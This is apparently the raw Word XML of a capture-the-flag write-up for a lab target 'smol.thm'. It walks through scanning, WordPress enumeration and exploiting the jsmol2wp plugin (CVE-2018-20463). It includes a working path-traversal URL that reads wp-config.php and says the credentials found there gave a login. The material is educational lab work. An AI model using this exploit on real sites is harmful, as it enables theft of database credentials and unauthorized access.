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A38C" w14:textId="4952F365" w:rsidR="00D60B3C" w:rsidRPr="003E2CB8" w:rsidRDefault="00970677" w:rsidP="003E2CB8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3E2CB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Smol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E2CB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Solution Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394C9DCB" w14:textId="770ED79F" w:rsidR="00970677" w:rsidRPr="003E2CB8" w:rsidRDefault="00970677" w:rsidP="003E2CB8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E2CB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Written By: Yuval Quina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DF2727" w14:textId="407811C7" w:rsidR="00970677" w:rsidRDefault="00970677">
      <w:r>
        <w:t>I started</w:t>
      </w:r>
      <w:r w:rsidR="00E66F0C">
        <w:t xml:space="preserve"> this CTF by performing a</w:t>
      </w:r>
      <w:r w:rsidR="00C71E1E">
        <w:t>n Nmap scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C45553" w14:textId="5BE571EF" w:rsidR="00C71E1E" w:rsidRDefault="00C71E1E">
      <w:r w:rsidRPr="00C71E1E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C50CA40" wp14:editId="126BA65C">
            <wp:extent cx="5239204" cy="2141406"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12845538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53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20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239B" w14:textId="3E5C6E9B" w:rsidR="00DD5950" w:rsidRDefault="00DD5950">
      <w:r>
        <w:t xml:space="preserve">I notice that ports 22 (ssh) and 80 (http) are open, which means the target runs a website </w:t>
      </w:r>
      <w:r w:rsidR="00E35102">
        <w:t>and that I can afterward</w:t>
      </w:r>
      <w:r w:rsidR="006F703B">
        <w:t xml:space="preserve"> get a ssh shell </w:t>
      </w:r>
      <w:r w:rsidR="0022559E">
        <w:t>over the target’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2077C24B" w14:textId="7CFAB06D" w:rsidR="00061FEE" w:rsidRDefault="00A67880" w:rsidP="00850443">
      <w:r>
        <w:t xml:space="preserve">In addition, I found the </w:t>
      </w:r>
      <w:r w:rsidR="00FB1048">
        <w:t>domain of the target “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB1048">
        <w:t>smol.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB1048">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00494195">
        <w:t xml:space="preserve"> from the description </w:t>
      </w:r>
      <w:r w:rsidR="00AA5CF5">
        <w:t>of the Nmap scan resu</w:t>
      </w:r>
      <w:r w:rsidR="00827DDC">
        <w:t>lt</w:t>
      </w:r>
      <w:r w:rsidR="00AA5CF5">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BC0977">
        <w:t xml:space="preserve">, so I added it </w:t>
      </w:r>
      <w:r w:rsidR="004A7711">
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r w:rsidR="00CC4369">
        <w:t>hosts file of my machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C60015D" w14:textId="655E00FE" w:rsidR="008E291F" w:rsidRDefault="00130F81" w:rsidP="00C34151">
      <w:r w:rsidRPr="00130F81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F954F46" wp14:editId="4E0F1D73">
            <wp:extent cx="3036833" cy="998307"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11336366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36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683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D436" w14:textId="1D343B4F" w:rsidR="00C34151" w:rsidRDefault="00C34151" w:rsidP="00C34151">
      <w:r>
        <w:t xml:space="preserve">Before </w:t>
      </w:r>
      <w:r w:rsidR="00502F06">
        <w:t>starting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploring the website, I run a </w:t>
      </w:r>
      <w:r w:rsidR="00041D42">
        <w:t xml:space="preserve">Gobuster directory enumeration </w:t>
      </w:r>
      <w:r w:rsidR="00055465">
        <w:t>scan to detect useful pages</w:t>
      </w:r>
      <w:r w:rsidR="00F661BE">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D5873" w14:textId="442EE1CF" w:rsidR="00F661BE" w:rsidRDefault="00037437" w:rsidP="00C34151">
      <w:r w:rsidRPr="00037437">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55998901" wp14:editId="710298F8">
            <wp:extent cx="4839119" cy="3238781"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="704006897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06897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E01D" w14:textId="538E3D4A" w:rsidR="00055465" w:rsidRDefault="00227BC6" w:rsidP="00C34151">
      <w:r>
        <w:t xml:space="preserve">I found wp-content </w:t>
      </w:r>
      <w:r w:rsidR="002D6DC2">
        <w:t>director</w:t>
      </w:r>
      <w:r w:rsidR="006071F6">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="00537F41">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503FBCF" w14:textId="28E38641" w:rsidR="00537F41" w:rsidRDefault="006071F6" w:rsidP="00C34151">
      <w:r w:rsidRPr="006071F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BA22934" wp14:editId="57139591">
            <wp:extent cx="5334462" cy="5132515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12038947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94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1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3882" w14:textId="7068B833" w:rsidR="00373DE2" w:rsidRDefault="00373DE2" w:rsidP="00C34151">
      <w:r>
        <w:t>Here I found nothing unusual, so moved to the website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE543B" w14:textId="66F464AE" w:rsidR="004E0196" w:rsidRDefault="003011B1" w:rsidP="00850443">
      <w:r w:rsidRPr="003011B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48C75D99" wp14:editId="55A32D43">
            <wp:extent cx="7556500" cy="4723130"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="139976521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5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D36D" w14:textId="5A566C14" w:rsidR="001660ED" w:rsidRDefault="001660ED" w:rsidP="00850443">
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="006C2AB9">
        <w:t xml:space="preserve">briefly looked through the </w:t>
      </w:r>
      <w:r w:rsidR="00C45B92">
        <w:t xml:space="preserve">website </w:t>
      </w:r>
      <w:r w:rsidR="00226C42">
        <w:t>and clicked on the “Privacy Policy</w:t>
      </w:r>
      <w:r w:rsidR="007F7EA7">
        <w:t>” link.</w:t>
      </w:r>
      <w:r w:rsidR="00D92A74">
        <w:t xml:space="preserve"> This took me to t</w:t>
      </w:r>
      <w:r w:rsidR="005C4F83">
        <w:t xml:space="preserve">he privacy policy page (with the </w:t>
      </w:r>
      <w:r w:rsidR="00307B78">
        <w:t>endpoint “</w:t>
      </w:r>
      <w:r w:rsidR="00307B78" w:rsidRPr="00307B78">
        <w:t>/index.php/privacy-policy/</w:t>
      </w:r>
      <w:r w:rsidR="00307B78">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="005C4F83">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D92A74">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A726EAC" w14:textId="015151A3" w:rsidR="00D92A74" w:rsidRDefault="00D92A74" w:rsidP="00850443">
      <w:r w:rsidRPr="00D92A74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27B583BA" wp14:editId="798B422C">
            <wp:extent cx="4770533" cy="4801016"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11434334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33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73EF" w14:textId="598494D7" w:rsidR="0036647F" w:rsidRDefault="0036647F" w:rsidP="00850443">
      <w:r>
        <w:t xml:space="preserve">I read a bit the paragraphs and </w:t>
      </w:r>
      <w:r w:rsidR="00C272EC">
        <w:t xml:space="preserve">notice </w:t>
      </w:r>
      <w:r w:rsidR="00367857">
        <w:t xml:space="preserve">several </w:t>
      </w:r>
      <w:r w:rsidR="00886D4F">
        <w:t xml:space="preserve">suspicious clues </w:t>
      </w:r>
      <w:r w:rsidR="00BD25F6">
        <w:t>here</w:t>
      </w:r>
      <w:r w:rsidR="00DE1843">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326FCF0E" w14:textId="6482A69E" w:rsidR="00367857" w:rsidRDefault="00367857" w:rsidP="00850443">
      <w:r>
        <w:t xml:space="preserve">First of all, I saw </w:t>
      </w:r>
      <w:r w:rsidR="0023757F">
        <w:t>that the write</w:t>
      </w:r>
      <w:r w:rsidR="00EB2624">
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r w:rsidR="00036493">
        <w:t>leads</w:t>
      </w:r>
      <w:r w:rsidR="00EB2624">
        <w:t xml:space="preserve"> me to a website that runs on “192.168.204.139”</w:t>
      </w:r>
      <w:r w:rsidR="00B65B63">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A732920" w14:textId="7BD463FA" w:rsidR="009F5AC8" w:rsidRDefault="009F5AC8" w:rsidP="00850443">
      <w:r>
        <w:t>Second,</w:t>
      </w:r>
      <w:r w:rsidR="00E17A81">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C2517">
        <w:t>in the “Comments” section,</w:t>
      </w:r>
      <w:r w:rsidR="00036493">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00951205">
        <w:t>it was written that</w:t>
      </w:r>
      <w:r w:rsidR="00702863">
        <w:t xml:space="preserve"> there is a string of a hash which </w:t>
      </w:r>
      <w:r w:rsidR="009E449D">
        <w:t xml:space="preserve">is being provided to the “Gravatar” </w:t>
      </w:r>
      <w:r w:rsidR="00020B97">
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidR="00A75D07">
        <w:t xml:space="preserve"> which can be vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FBF8F6" w14:textId="23EB8350" w:rsidR="00144EE5" w:rsidRDefault="00144EE5" w:rsidP="00850443">
      <w:r>
        <w:t xml:space="preserve">In addition, </w:t>
      </w:r>
      <w:r w:rsidR="006C60EB">
        <w:t>in the “Medi</w:t>
      </w:r>
      <w:r w:rsidR="002B5DEE">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006C60EB">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="002C506D">
        <w:t xml:space="preserve"> section, </w:t>
      </w:r>
      <w:r w:rsidR="00C31278">
        <w:t>the writer mentioned that</w:t>
      </w:r>
      <w:r w:rsidR="00B248BC">
        <w:t xml:space="preserve"> we ,as users, </w:t>
      </w:r>
      <w:r w:rsidR="00A14E0F">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00872097">
        <w:t>should avoid uploading images with embedded location data</w:t>
      </w:r>
      <w:r w:rsidR="00A14E0F">
        <w:t xml:space="preserve"> (EXIF GPS)</w:t>
      </w:r>
      <w:r w:rsidR="00872097">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008038A4">
        <w:t>included</w:t>
      </w:r>
      <w:r w:rsidR="00A14E0F">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008038A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D2368">
        <w:t xml:space="preserve">due to the reason that other users </w:t>
      </w:r>
      <w:r w:rsidR="000B72CF">
        <w:t xml:space="preserve">can download the </w:t>
      </w:r>
      <w:r w:rsidR="00861325">
        <w:t>images</w:t>
      </w:r>
      <w:r w:rsidR="003E0AF3">
        <w:t xml:space="preserve">. This warning actually </w:t>
      </w:r>
      <w:r w:rsidR="00223729">
        <w:t>raised</w:t>
      </w:r>
      <w:r w:rsidR="00FF7445">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C30737">
        <w:t xml:space="preserve">a red flag </w:t>
      </w:r>
      <w:r w:rsidR="008604D9">
        <w:t xml:space="preserve">to me because it </w:t>
      </w:r>
      <w:r w:rsidR="000F2A75">
        <w:t>describes</w:t>
      </w:r>
      <w:r w:rsidR="008604D9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0057262B">
        <w:t xml:space="preserve">a situation where </w:t>
      </w:r>
      <w:r w:rsidR="009C3ABE">
        <w:t xml:space="preserve">I can try to execute </w:t>
      </w:r>
      <w:r w:rsidR="007638B3">
        <w:t>an RCE</w:t>
      </w:r>
      <w:r w:rsidR="009C3ABE">
        <w:t xml:space="preserve"> attack over other users</w:t>
      </w:r>
      <w:r w:rsidR="0068567D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E5E52B" w14:textId="77777777" w:rsidR="00716D62" w:rsidRDefault="001B1E29" w:rsidP="00716D62">
      <w:r>
        <w:t xml:space="preserve">At this point, I </w:t>
      </w:r>
      <w:r w:rsidR="008F4B3C">
        <w:t xml:space="preserve">clicked on the </w:t>
      </w:r>
      <w:r w:rsidR="00154DAF">
        <w:t xml:space="preserve">“RCE” </w:t>
      </w:r>
      <w:r w:rsidR="00871FCA">
        <w:t xml:space="preserve">post and </w:t>
      </w:r>
      <w:r w:rsidR="00387530">
        <w:t>scrolled to the bottom in order to see the comments</w:t>
      </w:r>
      <w:r w:rsidR="00716D62">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3ABC66" w14:textId="77777777" w:rsidR="002774B7" w:rsidRDefault="000973F9" w:rsidP="00716D62">
      <w:r w:rsidRPr="000973F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3322E7A9" wp14:editId="4F9EB157">
            <wp:extent cx="7556500" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="19825661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66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AD0E" w14:textId="77777777" w:rsidR="00B00BFD" w:rsidRDefault="002774B7" w:rsidP="00716D62">
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="002607B6">
        <w:t xml:space="preserve">saw here a </w:t>
      </w:r>
      <w:r w:rsidR="008553D8">
        <w:t xml:space="preserve">“logged in” </w:t>
      </w:r>
      <w:r w:rsidR="00B00BFD">
        <w:t>link and I clicked on it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CD04B3" w14:textId="77777777" w:rsidR="00C556FE" w:rsidRDefault="00C556FE" w:rsidP="00716D62">
      <w:r w:rsidRPr="00C556FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="478EAE81" wp14:editId="7792F9C7">
            <wp:extent cx="7556500" cy="3510280"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="183076345" name="תמונה 1" descr="תמונה שמכילה טקסט, תוכנה, סמל מחשב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6345" name="תמונה 1" descr="תמונה שמכילה טקסט, תוכנה, סמל מחשב, תכונות מולטימדיה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EAD4" w14:textId="05AB9DC0" w:rsidR="000F6E85" w:rsidRDefault="00964361" w:rsidP="0055240A">
      <w:r>
        <w:t>And I was faced with</w:t>
      </w:r>
      <w:r w:rsidR="00840A60">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00141D52">
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidR="00840A60">
        <w:t xml:space="preserve"> login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B588E6" w14:textId="7E3F55D9" w:rsidR="0055240A" w:rsidRDefault="001A6BC2" w:rsidP="0055240A">
      <w:r>
        <w:t>Thereafter</w:t>
      </w:r>
      <w:r w:rsidR="0055240A">
        <w:t xml:space="preserve">, I </w:t>
      </w:r>
      <w:r w:rsidR="002B4D03">
        <w:t xml:space="preserve">used wpscan tool </w:t>
      </w:r>
      <w:r w:rsidR="002A5664">
        <w:t xml:space="preserve">to find users and vulnerabilities over this </w:t>
      </w:r>
      <w:r w:rsidR="002D686F">
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidR="002A5664">
        <w:t xml:space="preserve"> website</w:t>
      </w:r>
      <w:r w:rsidR="00373A15">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFDFAA6" w14:textId="5ADB555E" w:rsidR="00976703" w:rsidRDefault="00F25D63" w:rsidP="001018D1">
      <w:r w:rsidRPr="00F25D63">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B66EA9D" wp14:editId="02FD1BDC">
            <wp:extent cx="3734124" cy="1371719"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1479476467" name="תמונה 1" descr="תמונה שמכילה טקסט, גופן, צילום מסך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76467" name="תמונה 1" descr="תמונה שמכילה טקסט, גופן, צילום מסך, מספר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D63">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AA744CA" wp14:editId="4663BB20">
            <wp:extent cx="7304403" cy="1969941"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1101551810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51810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04403" cy="19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CEFA" w14:textId="4D061919" w:rsidR="00F25D63" w:rsidRDefault="00186FF2" w:rsidP="00086267">
      <w:r>
        <w:t xml:space="preserve">Here I found a </w:t>
      </w:r>
      <w:r w:rsidR="007B3DFC">
        <w:t>plugin named “jsmol2wp”.</w:t>
      </w:r>
      <w:r w:rsidR="00AD50BC">
        <w:t xml:space="preserve"> This plugin </w:t>
      </w:r>
      <w:r w:rsidR="005B657C">
        <w:t>version is 1.07 which means it</w:t>
      </w:r>
      <w:r w:rsidR="00B25CF7">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00F97754">
        <w:t xml:space="preserve"> vulnerable to</w:t>
      </w:r>
      <w:r w:rsidR="006B41C4">
        <w:t xml:space="preserve"> the specific</w:t>
      </w:r>
      <w:r w:rsidR="00F97754">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0087317E">
        <w:t xml:space="preserve">unauthenticated </w:t>
      </w:r>
      <w:r w:rsidR="0087317E" w:rsidRPr="0087317E">
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidR="00794631">
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="006B41C4">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="006B41C4" w:rsidRPr="006B41C4">
        <w:t>CVE-2018-20463</w:t>
      </w:r>
      <w:r w:rsidR="006B41C4">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00ED6F4E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00ED6F4E" w:rsidRPr="00ED6F4E">
        <w:t>a vulnerability where an attacker, without needing login credentials, tricks a web application's server into making unauthorized requests to internal or external resources, potentially exposing sensitive data or enabling further attacks</w:t>
      </w:r>
      <w:r w:rsidR="00ED6F4E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00FF0613">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9AD239" w14:textId="19FC3B31" w:rsidR="00367130" w:rsidRDefault="00BA3BDC" w:rsidP="00485FFC">
      <w:r>
        <w:t>The vulnerability originally from a</w:t>
      </w:r>
      <w:r w:rsidR="003B4E19">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00472476">
        <w:t>file that located on “</w:t>
      </w:r>
      <w:r w:rsidR="00472476" w:rsidRPr="00472476">
        <w:t>/wp-content/plugins/jsmol2wp/php/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00472476" w:rsidRPr="00472476">
        <w:t>jsmol.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00472476">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="0039128D">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="002811B9">
        <w:t xml:space="preserve">gets </w:t>
      </w:r>
      <w:r w:rsidR="00693EE4">
        <w:t>several parameters like “</w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5" w:rsidRPr="00B83DF5">
        <w:t>inform</w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5" w:rsidRPr="00B83DF5">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5" w:rsidRPr="00B83DF5">
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5" w:rsidRPr="00B83DF5">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5" w:rsidRPr="00B83DF5">
        <w:t>query</w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5" w:rsidRPr="00B83DF5">
        <w:t xml:space="preserve"> and more</w:t>
      </w:r>
      <w:r w:rsidR="00B83DF5">
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidR="003C58DB">
        <w:t xml:space="preserve"> from the url</w:t>
      </w:r>
      <w:r w:rsidR="00DC7D8A">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00913E35">
        <w:t xml:space="preserve">use their values </w:t>
      </w:r>
      <w:r w:rsidR="00833326">
        <w:t xml:space="preserve">without </w:t>
      </w:r>
      <w:r w:rsidR="00833326" w:rsidRPr="00833326">
        <w:t>sensitiz</w:t>
      </w:r>
      <w:r w:rsidR="00833326">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="008D4802">
        <w:t xml:space="preserve"> them</w:t>
      </w:r>
      <w:r w:rsidR="00485FFC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6429ED" w14:textId="63C440B4" w:rsidR="00485FFC" w:rsidRDefault="00485FFC" w:rsidP="00485FFC">
      <w:r>
        <w:t xml:space="preserve">Therefore, I wrote this </w:t>
      </w:r>
      <w:r w:rsidR="006C2B25">
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidR="00F80EF7">
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidR="007F1413">
        <w:t>an LFI</w:t>
      </w:r>
      <w:r w:rsidR="00624C7C">
        <w:t xml:space="preserve"> (Local File Inclusion)</w:t>
      </w:r>
      <w:r w:rsidR="00F80EF7">
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r w:rsidR="00160CBB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30333B7E" w14:textId="052CAF7C" w:rsidR="00374DB5" w:rsidRDefault="00374DB5" w:rsidP="00374DB5">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00784285">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&amp;call=getRawDataFromDatabase&amp;query=php://filter/resource=../../../../wp-config.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A595FA0" w14:textId="2E9A57EA" w:rsidR="00374DB5" w:rsidRDefault="00374DB5" w:rsidP="00374DB5">
      <w:r>
        <w:t xml:space="preserve">In short, it basically </w:t>
      </w:r>
      <w:r w:rsidR="007C61C8">
        <w:t>creates an internal php request</w:t>
      </w:r>
      <w:r w:rsidR="008B0114">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A66F80">
        <w:t>to the file “wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A66F80">
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A66F80">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00B34596">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="009B5EE8">
        <w:t>path traversal</w:t>
      </w:r>
      <w:r w:rsidR="005445A6">
        <w:t xml:space="preserve"> (I know the location of “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005445A6">
        <w:t>jsmol.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005445A6">
        <w:t xml:space="preserve">” because I found the source code of the jsmol2wp in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005445A6">
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005445A6">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB4D23" w14:textId="5B9F2D3E" w:rsidR="00160CBB" w:rsidRDefault="00A4441E" w:rsidP="00485FFC">
      <w:r w:rsidRPr="00A4441E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04979771" wp14:editId="1AE4439F">
            <wp:extent cx="7556500" cy="3386455"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="114982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7FBA" w14:textId="10B06F5F" w:rsidR="003778EE" w:rsidRDefault="003778EE" w:rsidP="00485FFC">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00963A5F">
        <w:t xml:space="preserve"> chose this specific file on purpose because it </w:t>
      </w:r>
      <w:r w:rsidR="00CB1AF3">
        <w:t>contain</w:t>
      </w:r>
      <w:r w:rsidR="00773244">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CB1AF3">
        <w:t xml:space="preserve"> a lot of useful</w:t>
      </w:r>
      <w:r w:rsidR="00CF1E96">
        <w:t xml:space="preserve"> data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BE45A5" w14:textId="05A07C4B" w:rsidR="001060CF" w:rsidRDefault="001060CF" w:rsidP="00485FFC">
      <w:r>
        <w:t xml:space="preserve">Immediately, I </w:t>
      </w:r>
      <w:r w:rsidR="00545478">
        <w:t xml:space="preserve">understood that this is a MySQL database because it </w:t>
      </w:r>
      <w:r w:rsidR="000F6E9B">
        <w:t xml:space="preserve">doesn’t contain any additional configurations </w:t>
      </w:r>
      <w:r w:rsidR="00675F88">
        <w:t xml:space="preserve">due to the fact that by default </w:t>
      </w:r>
      <w:r w:rsidR="004D2E9B">
        <w:t xml:space="preserve">WordPress </w:t>
      </w:r>
      <w:r w:rsidR="00A23066">
        <w:t xml:space="preserve">support </w:t>
      </w:r>
      <w:r w:rsidR="00182EE0">
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="008650C4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F2E27" w14:textId="03D74FD2" w:rsidR="006A22EB" w:rsidRDefault="003509C0" w:rsidP="00693A3D">
      <w:r>
        <w:t xml:space="preserve">After reading the </w:t>
      </w:r>
      <w:r w:rsidR="00C81626">
        <w:t>database settings,</w:t>
      </w:r>
      <w:r w:rsidR="000C5DDF">
        <w:t xml:space="preserve"> I </w:t>
      </w:r>
      <w:r w:rsidR="00693A3D">
        <w:t xml:space="preserve">saw in the database settings, the database user credentials so I tried to use it on the login </w:t>
      </w:r>
      <w:r w:rsidR="004C0E87">
        <w:t>page,</w:t>
      </w:r>
      <w:r w:rsidR="00693A3D">
        <w:t xml:space="preserve"> and it worked!</w:t>
      </w:r>
